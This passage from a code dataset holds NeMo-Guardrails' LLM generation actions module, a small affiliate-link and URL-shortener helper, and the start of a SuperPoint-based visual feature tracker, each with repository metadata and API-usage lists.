"urllib.request.request.urlopen", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 33, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.request.error", "line_number": 36, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 41, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.S", "line_number": 42, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.S", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 62, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 66, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 67, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 69, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 70, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 90, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 112, "usage_type": "call"}]}
+{"seq_id": "70313852647", "text": "import asyncio\nimport logging\nimport random\nimport re\nimport sys\nimport threading\nimport uuid\nfrom ast import literal_eval\nfrom functools import lru_cache\nfrom time import time\nfrom typing import Callable, List, Optional\n\nfrom jinja2 import Environment, meta\nfrom langchain.llms import BaseLLM\n\nfrom nemoguardrails.actions.actions import ActionResult, action\nfrom nemoguardrails.actions.llm.utils import (\n flow_to_colang,\n get_first_nonempty_line,\n get_last_bot_intent_event,\n get_last_user_intent_event,\n get_last_user_utterance_event,\n get_multiline_response,\n get_retrieved_relevant_chunks,\n llm_call,\n strip_quotes,\n)\nfrom nemoguardrails.embeddings.index import EmbeddingsIndex, IndexItem\nfrom nemoguardrails.language.parser import parse_colang_file\nfrom nemoguardrails.llm.params import llm_params\nfrom nemoguardrails.llm.taskmanager import LLMTaskManager\nfrom nemoguardrails.llm.types import Task\nfrom nemoguardrails.patch_asyncio import check_sync_call_from_async_loop\nfrom nemoguardrails.rails.llm.config import EmbeddingSearchProvider, RailsConfig\nfrom nemoguardrails.utils import new_event_dict\n\nlog = logging.getLogger(__name__)\n\n\nclass LLMGenerationActions:\n \"\"\"A container objects for multiple related actions.\"\"\"\n\n def __init__(\n self,\n config: RailsConfig,\n llm: BaseLLM,\n llm_task_manager: LLMTaskManager,\n get_embedding_search_provider_instance: Callable[\n [Optional[EmbeddingSearchProvider]], EmbeddingsIndex\n ],\n verbose: bool = False,\n ):\n self.config = config\n self.llm = llm\n self.verbose = verbose\n\n # If we have user messages, we build an index with them\n self.user_message_index = None\n self.bot_message_index = None\n self.flows_index = None\n\n self.get_embedding_search_provider_instance = (\n get_embedding_search_provider_instance\n )\n\n if check_sync_call_from_async_loop():\n t = threading.Thread(target=asyncio.run, args=(self.init(),))\n t.start()\n t.join()\n else:\n asyncio.run(self.init())\n\n self.llm_task_manager = llm_task_manager\n\n # We also initialize the environment for rendering bot messages\n self.env = Environment()\n\n async def init(self):\n await asyncio.gather(\n self._init_user_message_index(),\n self._init_bot_message_index(),\n self._init_flows_index(),\n )\n\n async def _init_user_message_index(self):\n \"\"\"Initializes the index of user messages.\"\"\"\n\n if not self.config.user_messages:\n return\n\n items = []\n for intent, utterances in self.config.user_messages.items():\n for text in utterances:\n items.append(IndexItem(text=text, meta={\"intent\": intent}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.user_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.user_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.user_message_index.build()\n\n async def _init_bot_message_index(self):\n \"\"\"Initializes the index of bot messages.\"\"\"\n\n if not self.config.bot_messages:\n return\n\n items = []\n for intent, utterances in self.config.bot_messages.items():\n for text in utterances:\n items.append(IndexItem(text=intent, meta={\"text\": text}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.bot_message_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.bot_message_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.bot_message_index.build()\n\n async def _init_flows_index(self):\n \"\"\"Initializes the index of flows.\"\"\"\n\n if not self.config.flows:\n return\n\n items = []\n for flow in self.config.flows:\n # We don't include the default system flows in the index because we don't want\n # the LLM to predict system actions.\n if flow.get(\"id\") in [\n \"generate user intent\",\n \"generate next step\",\n \"generate bot message\",\n ]:\n continue\n\n # TODO: check if the flow has system actions and ignore the flow.\n\n colang_flow = flow.get(\"source_code\") or flow_to_colang(flow)\n\n # We index on the full body for now\n items.append(IndexItem(text=colang_flow, meta={\"flow\": colang_flow}))\n\n # If we have no patterns, we stop.\n if len(items) == 0:\n return\n\n self.flows_index = self.get_embedding_search_provider_instance(\n self.config.core.embedding_search_provider\n )\n await self.flows_index.add_items(items)\n\n # NOTE: this should be very fast, otherwise needs to be moved to separate thread.\n await self.flows_index.build()\n\n def _get_general_instruction(self):\n \"\"\"Helper to extract the general instruction.\"\"\"\n text = \"\"\n for instruction in self.config.instructions:\n if instruction.type == \"general\":\n text = instruction.content\n\n # We stop at the first one for now\n break\n\n return text\n\n @lru_cache\n def _get_sample_conversation_two_turns(self):\n \"\"\"Helper to extract only the two turns from the sample conversation.\n\n This is needed to be included to \"seed\" the conversation so that the model\n can follow the format more easily.\n \"\"\"\n lines = self.config.sample_conversation.split(\"\\n\")\n i = 0\n user_count = 0\n while i < len(lines):\n if lines[i].startswith(\"user \"):\n user_count += 1\n\n if user_count == 3:\n break\n\n i += 1\n\n sample_conversation = \"\\n\".join(lines[0:i])\n\n # Remove any trailing new lines\n sample_conversation = sample_conversation.strip()\n\n return sample_conversation\n\n @action(is_system_action=True)\n async def generate_user_intent(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the canonical form for what the user said i.e. user intent.\"\"\"\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UtteranceUserActionFinished\".\n event = get_last_user_utterance_event(events)\n assert event[\"type\"] == \"UtteranceUserActionFinished\"\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # TODO: check for an explicit way of enabling the canonical form detection\n\n if self.config.user_messages:\n # TODO: based on the config we can use a specific canonical forms model\n # or use the LLM to detect the canonical form. The below implementation\n # is for the latter.\n\n log.info(\"Phase 1: Generating user intent\")\n\n # We search for the most relevant similar user utterance\n examples = \"\"\n potential_user_intents = []\n\n if self.user_message_index:\n results = await self.user_message_index.search(\n text=event[\"final_transcript\"], max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"user \\\"{result.text}\\\"\\n {result.meta['intent']}\\n\\n\"\n potential_user_intents.append(result.meta[\"intent\"])\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_USER_INTENT,\n events=events,\n context={\n \"examples\": examples,\n \"potential_user_intents\": \", \".join(potential_user_intents),\n },\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_USER_INTENT, output=result\n )\n\n user_intent = get_first_nonempty_line(result)\n if user_intent is None:\n user_intent = \"unknown message\"\n\n if user_intent and user_intent.startswith(\"user \"):\n user_intent = user_intent[5:]\n\n log.info(\n \"Canonical form for user intent: \"\n + (user_intent if user_intent else \"None\")\n )\n\n if user_intent is None:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=\"unknown message\")]\n )\n else:\n return ActionResult(\n events=[new_event_dict(\"UserIntent\", intent=user_intent)]\n )\n else:\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERAL, events=events\n )\n\n # We make this call with temperature 0 to have it as deterministic as possible.\n result = await llm_call(llm, prompt)\n\n return ActionResult(\n events=[\n new_event_dict(\"StartUtteranceBotAction\", script=result.strip())\n ]\n )\n\n @action(is_system_action=True)\n async def generate_next_step(\n self, events: List[dict], llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate the next step in the current conversation flow.\n\n Currently, only generates a next step after a user intent.\n \"\"\"\n log.info(\"Phase 2 :: Generating next step ...\")\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"UserIntent\".\n event = get_last_user_intent_event(events)\n\n # Currently, we only predict next step after a user intent using LLM\n if event[\"type\"] == \"UserIntent\":\n user_intent = event[\"intent\"]\n\n # We search for the most relevant similar flows\n examples = \"\"\n if self.flows_index:\n results = await self.flows_index.search(text=user_intent, max_results=5)\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"{result.text}\\n\\n\"\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_NEXT_STEPS,\n events=events,\n context={\"examples\": examples},\n )\n\n # We use temperature 0 for next step prediction as well\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_NEXT_STEPS, output=result\n )\n\n # If we don't have multi-step generation enabled, we only look at the first line.\n if not self.config.enable_multi_step_generation:\n result = get_first_nonempty_line(result)\n\n if result and result.startswith(\"bot \"):\n next_step = {\"bot\": result[4:]}\n else:\n next_step = {\"bot\": \"general response\"}\n\n # If we have to execute an action, we return the event to start it\n if next_step.get(\"execute\"):\n return ActionResult(\n events=[\n new_event_dict(\n \"StartInternalSystemAction\",\n action_name=next_step[\"execute\"],\n )\n ]\n )\n else:\n bot_intent = next_step.get(\"bot\")\n\n return ActionResult(\n events=[new_event_dict(\"BotIntent\", intent=bot_intent)]\n )\n else:\n # Otherwise, we parse the output as a single flow.\n # If we have a parsing error, we try to reduce size of the flow, potentially\n # up to a single step.\n lines = result.split(\"\\n\")\n while True:\n try:\n parse_colang_file(\"dynamic.co\", content=\"\\n\".join(lines))\n break\n except Exception as e:\n # If we could not parse the flow on the last line, we return a general response\n if len(lines) == 1:\n log.info(\"Exception while parsing single line: %s\", e)\n return ActionResult(\n events=[\n new_event_dict(\n \"BotIntent\", intent=\"general response\"\n )\n ]\n )\n\n log.info(\"Could not parse %s lines, reducing size\", len(lines))\n lines = lines[:-1]\n\n return ActionResult(\n events=[\n # We generate a random UUID as the flow_id\n new_event_dict(\n \"start_flow\",\n flow_id=str(uuid.uuid4()),\n flow_body=\"\\n\".join(lines),\n )\n ]\n )\n\n return ActionResult(return_value=None)\n\n def _render_string(\n self,\n template_str: str,\n context: Optional[dict] = None,\n ) -> str:\n \"\"\"Render a string using the provided context information.\n\n Args:\n template_str: The string template to render.\n context: The context for rendering.\n\n Returns:\n The rendered string.\n \"\"\"\n # First, if we have any direct usage of variables in the string,\n # we replace with correct Jinja syntax.\n for param in re.findall(r\"\\$([^ \\\"'!?\\-,;]*(?:\\w|]))\", template_str):\n template_str = template_str.replace(f\"${param}\", \"{{\" + param + \"}}\")\n\n template = self.env.from_string(template_str)\n\n # First, we extract all the variables from the template.\n variables = meta.find_undeclared_variables(self.env.parse(template_str))\n\n # This is the context that will be passed to the template when rendering.\n render_context = {}\n\n # Copy the context variables to the render context.\n if context:\n for variable in variables:\n if variable in context:\n render_context[variable] = context[variable]\n\n return template.render(render_context)\n\n @action(is_system_action=True)\n async def generate_bot_message(\n self, events: List[dict], context: dict, llm: Optional[BaseLLM] = None\n ):\n \"\"\"Generate a bot message based on the desired bot intent.\"\"\"\n log.info(\"Phase 3 :: Generating bot message ...\")\n\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n # The last event should be the \"StartInternalSystemAction\" and the one before it the \"BotIntent\".\n event = get_last_bot_intent_event(events)\n assert event[\"type\"] == \"BotIntent\"\n bot_intent = event[\"intent\"]\n context_updates = {}\n\n if bot_intent in self.config.bot_messages:\n # Choose a message randomly from self.config.bot_messages[bot_message]\n # However, in test mode, we always choose the first one, to keep it predictable.\n if \"pytest\" in sys.modules:\n bot_utterance = self.config.bot_messages[bot_intent][0]\n else:\n bot_utterance = random.choice(self.config.bot_messages[bot_intent])\n\n log.info(\"Found existing bot message: \" + bot_utterance)\n\n # We also need to render\n bot_utterance = self._render_string(bot_utterance, context)\n\n # Check if the output is supposed to be the content of a context variable\n elif bot_intent[0] == \"$\" and bot_intent[1:] in context:\n bot_utterance = context[bot_intent[1:]]\n\n else:\n # We search for the most relevant similar bot utterance\n examples = \"\"\n # NOTE: disabling bot message index when there are no user messages\n if self.config.user_messages and self.bot_message_index:\n results = await self.bot_message_index.search(\n text=event[\"intent\"], max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n examples += f\"bot {result.text}\\n \\\"{result.meta['text']}\\\"\\n\\n\"\n\n # We compute the relevant chunks to be used as context\n relevant_chunks = get_retrieved_relevant_chunks(events)\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_BOT_MESSAGE,\n events=events,\n context={\"examples\": examples, \"relevant_chunks\": relevant_chunks},\n )\n\n t0 = time()\n result = await llm_call(llm, prompt)\n log.info(\n \"--- :: LLM Bot Message Generation call took %.2f seconds\", time() - t0\n )\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_BOT_MESSAGE, output=result\n )\n\n # TODO: catch openai.error.InvalidRequestError from exceeding max token length\n\n result = get_multiline_response(result)\n result = strip_quotes(result)\n\n bot_utterance = result\n\n # Context variable starting with \"_\" are considered private (not used in tests or logging)\n context_updates[\"_last_bot_prompt\"] = prompt\n\n log.info(f\"Generated bot message: {bot_utterance}\")\n\n if bot_utterance:\n return ActionResult(\n events=[\n new_event_dict(\"StartUtteranceBotAction\", script=bot_utterance)\n ],\n context_updates=context_updates,\n )\n else:\n return ActionResult(\n events=[\n new_event_dict(\n \"StartUtteranceBotAction\", script=\"I'm not sure what to say.\"\n )\n ],\n context_updates=context_updates,\n )\n\n @action(is_system_action=True)\n async def generate_value(\n self,\n instructions: str,\n events: List[dict],\n var_name: Optional[str] = None,\n llm: Optional[BaseLLM] = None,\n ):\n \"\"\"Generate a value in the context of the conversation.\n\n :param instructions: The instructions to generate the value.\n :param events: The full stream of events so far.\n :param var_name: The name of the variable to generate. If not specified, it will use\n the `action_result_key` as the name of the variable.\n :param llm: Custom llm model to generate_value\n \"\"\"\n # Use action specific llm if registered else fallback to main llm\n llm = llm or self.llm\n\n last_event = events[-1]\n assert last_event[\"type\"] == \"StartInternalSystemAction\"\n\n if not var_name:\n var_name = last_event[\"action_result_key\"]\n\n # We search for the most relevant flows.\n examples = \"\"\n if self.flows_index:\n results = await self.flows_index.search(\n text=f\"${var_name} = \", max_results=5\n )\n\n # We add these in reverse order so the most relevant is towards the end.\n for result in reversed(results):\n # If the flow includes \"= ...\", we ignore it as we don't want the LLM\n # to learn to predict \"...\".\n if not re.findall(r\"=\\s+\\.\\.\\.\", result.text):\n examples += f\"{result.text}\\n\\n\"\n\n prompt = self.llm_task_manager.render_task_prompt(\n task=Task.GENERATE_VALUE,\n events=events,\n context={\n \"examples\": examples,\n \"instructions\": instructions,\n \"var_name\": var_name,\n },\n )\n\n with llm_params(llm, temperature=self.config.lowest_temperature):\n result = await llm_call(llm, prompt)\n\n # Parse the output using the associated parser\n result = self.llm_task_manager.parse_task_output(\n Task.GENERATE_VALUE, output=result\n )\n\n # We only use the first line for now\n # TODO: support multi-line values?\n value = result.strip().split(\"\\n\")[0]\n\n # Because of conventions from other languages, sometimes the LLM might add\n # a \";\" at the end of the line. We remove that\n if value.endswith(\";\"):\n value = value[:-1]\n\n log.info(f\"Generated value for ${var_name}: {value}\")\n\n return literal_eval(value)\n", "repo_name": "NVIDIA/NeMo-Guardrails", "sub_path": "nemoguardrails/actions/llm/generation.py", "file_name": "generation.py", "file_ext": "py", "file_size_in_byte": 21995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2560, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 37, "usage_type": "call"}, {"api_name": "nemoguardrails.rails.llm.config.RailsConfig", "line_number": 45, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 46, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.taskmanager.LLMTaskManager", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "nemoguardrails.rails.llm.config.EmbeddingSearchProvider", "line_number": 49, "usage_type": "name"}, {"api_name": "nemoguardrails.embeddings.index.EmbeddingsIndex", "line_number": 49, "usage_type": "name"}, {"api_name": "nemoguardrails.patch_asyncio.check_sync_call_from_async_loop", "line_number": 66, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 67, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 67, "usage_type": "attribute"}, {"api_name": "asyncio.run", "line_number": 71, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 79, "usage_type": "call"}, {"api_name": "nemoguardrails.embeddings.index.IndexItem", "line_number": 94, "usage_type": "call"}, {"api_name": "nemoguardrails.embeddings.index.IndexItem", "line_number": 117, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.flow_to_colang", "line_number": 150, "usage_type": "call"}, {"api_name": "nemoguardrails.embeddings.index.IndexItem", "line_number": 153, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 207, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 207, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_last_user_utterance_event", "line_number": 212, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_USER_INTENT", "line_number": 242, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 242, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.params.llm_params", "line_number": 251, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 252, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_USER_INTENT", "line_number": 256, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 256, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_first_nonempty_line", "line_number": 259, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 272, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 273, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 276, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 277, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERAL", "line_number": 281, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 281, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 285, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 287, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 289, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 205, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 295, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 295, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 295, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_last_user_intent_event", "line_number": 307, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_NEXT_STEPS", "line_number": 323, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 323, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.params.llm_params", "line_number": 329, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 330, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_NEXT_STEPS", "line_number": 334, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 334, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_first_nonempty_line", "line_number": 339, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 348, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 350, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 359, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 360, "usage_type": "call"}, {"api_name": "nemoguardrails.language.parser.parse_colang_file", "line_number": 369, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 375, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 377, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 386, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 389, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 391, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 397, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 293, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 402, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 415, "usage_type": "call"}, {"api_name": "jinja2.meta.find_undeclared_variables", "line_number": 421, "usage_type": "call"}, {"api_name": "jinja2.meta", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 436, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 436, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 436, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_last_bot_intent_event", "line_number": 445, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 453, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 456, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.get_retrieved_relevant_chunks", "line_number": 481, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_BOT_MESSAGE", "line_number": 484, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 484, "usage_type": "name"}, {"api_name": "time.time", "line_number": 489, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 490, "usage_type": "call"}, {"api_name": "time.time", "line_number": 492, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_BOT_MESSAGE", "line_number": 497, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 497, "usage_type": "name"}, {"api_name": "nemoguardrails.actions.llm.utils.get_multiline_response", "line_number": 502, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.strip_quotes", "line_number": 503, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 513, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 515, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.ActionResult", "line_number": 520, "usage_type": "call"}, {"api_name": "nemoguardrails.utils.new_event_dict", "line_number": 522, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 434, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 533, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 534, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 535, "usage_type": "name"}, {"api_name": "langchain.llms.BaseLLM", "line_number": 535, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 565, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_VALUE", "line_number": 569, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 569, "usage_type": "name"}, {"api_name": "nemoguardrails.llm.params.llm_params", "line_number": 578, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.llm.utils.llm_call", "line_number": 579, "usage_type": "call"}, {"api_name": "nemoguardrails.llm.types.Task.GENERATE_VALUE", "line_number": 583, "usage_type": "attribute"}, {"api_name": "nemoguardrails.llm.types.Task", "line_number": 583, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 597, "usage_type": "call"}, {"api_name": "nemoguardrails.actions.actions.action", "line_number": 529, "usage_type": "call"}]}
+{"seq_id": "17997494700", "text": "#-*- coding: utf-8 -*-\n\nimport os\nimport xlrd\n#import urllib3\nimport tldextract\nfrom shortener import Shortener\n\nclass PpomppuLinkGenerator:\n LINKPRICE_ID = 'A100528376'\n\n def __init__(self):\n self.listLinkPrice = self.getLinkPriceData()\n\n def getShortener(self, url=None):\n shortener = Shortener()\n return shortener.genShortenerBitly(url=url)\n\n def genLink(self, url=None):\n extracted = tldextract.extract(url)\n domain = \"{}.{}\".format(extracted.domain, extracted.suffix)\n\n if domain in self.listLinkPrice.keys():\n return self.getShortener(url=self.getLinkLinkPrice(key=self.listLinkPrice[domain], url=url))\n #return self.getLinkLinkPrice(key=self.listLinkPrice[domain], url=url)\n\n return False\n\n def getLinkPriceData(self):\n data = dict()\n\n wb = xlrd.open_workbook(os.path.join(os.path.join(os.path.dirname(__file__), 'data'), 'linkprice.xlsx'))\n\n # Get the first sheet either by index or by name\n sh = wb.sheet_by_index(0)\n\n # Iterate through rows, returning each as a list that you can index:\n for rownum in range(sh.nrows):\n if rownum == 0:\n continue\n\n extracted = tldextract.extract(sh.row_values(rownum)[1])\n domain = \"{}.{}\".format(extracted.domain, extracted.suffix)\n\n if len(domain) > 0:\n if len(sh.row_values(rownum)[0]) > 0:\n data[domain] = sh.row_values(rownum)[0]\n\n\n return data\n\n def getLinkLinkPrice(self, key=None , url=None):\n if key is None or url is None:\n return False\n\n #url = urllib3.parse.quote_plus(url)\n\n return 'http://click.linkprice.com/click.php?m=%s&a=%s&l=9999&l_cd1=3&l_cd2=0&tu=%s' % (key, self.LINKPRICE_ID, url)\n\nif __name__ == \"__main__\":\n ppomppuLinkGenerator = PpomppuLinkGenerator()\n #print(ppomppuLinkGenerator.genLink(url='http://item.gmarket.co.kr/detailview/item.asp?goodscode=1401721949'))", "repo_name": "ko9ma7/crawler-1", "sub_path": "ppomppu_link_generator.py", "file_name": "ppomppu_link_generator.py", "file_ext": "py", "file_size_in_byte": 2003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "shortener.Shortener", "line_number": 16, "usage_type": "call"}, {"api_name": "shortener.genShortenerBitly", "line_number": 17, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 20, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 32, "usage_type": "call"}, {"api_name": "tldextract.extract", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "4960423192", "text": "import cv2\nimport copy\nimport numpy as np \nfrom time import time\n\nfrom utils.feature_process import PointTracker\nfrom utils.feature_process import SuperPointFrontend_torch, SuperPointFrontend\nrun_time = 0.0\nmatch_time = 0.0\n\nmyjet = np.array([[0. , 0. , 0.5 ],\n [0. , 0. , 0.99910873],\n [0. , 0.37843137, 1. ],\n [0. , 0.83333333, 1. ],\n [0.30044276, 1. , 0.66729918],\n [0.66729918, 1. , 0.30044276],\n [1. , 0.90123457, 0. ],\n [1. , 0.48002905, 0. ],\n [0.99910873, 0.07334786, 0. ],\n [0.5 , 0. , 0. ]])\n\n\nclass VisualTracker:\n\tdef __init__(self, opts, cams):\n\n\t\tself.forwframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None,\n\t\t\t\t}\n\n\t\tself.curframe_ = {\n\t\t\t\t'PointID': [],\n\t\t\t\t'keyPoint': np.zeros((3,0)),\n\t\t\t\t'descriptor': np.zeros((256,0)),\n\t\t\t\t'image': None\n\t\t\t\t}\n\t\n\t\tself.camera = cams\n\t\tself.new_frame = None\n\t\tself.allfeature_cnt = 0\n\t\t\n\t\tself.cuda = opts.cuda\n\t\tself.scale = opts.scale\n\t\tself.max_cnt = opts.max_cnt\n\t\tself.nms_dist = opts.nms_dist\n\t\tself.nn_thresh = opts.nn_thresh\n\t\tself.no_display = opts.no_display\n\t\tself.width = opts.W // opts.scale\n\t\tself.height = opts.H // opts.scale\n\t\tself.conf_thresh = opts.conf_thresh\n\t\tself.weights_path = opts.weights_path\n\n\t\t# SuperPointFrontend_torch 